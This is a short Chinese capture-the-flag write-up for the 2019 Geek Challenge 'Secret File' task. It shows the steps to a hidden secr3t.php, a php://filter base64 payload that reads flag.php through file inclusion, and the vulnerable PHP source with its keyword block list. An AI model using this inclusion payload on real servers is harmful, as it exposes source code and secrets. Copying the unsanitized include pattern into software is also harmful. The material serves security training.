[极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File
考点
文件包含配合伪协议读取文件
http
wp
抓包发现隐藏的链接Archive_room.php,访问发现新的链接action.php,接着抓包
访问secr3t.php
访问secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php即可
最后更新于
文件包含配合伪协议读取文件
http
抓包发现隐藏的链接Archive_room.php,访问发现新的链接action.php,接着抓包
访问secr3t.php
访问secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php即可
最后更新于
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>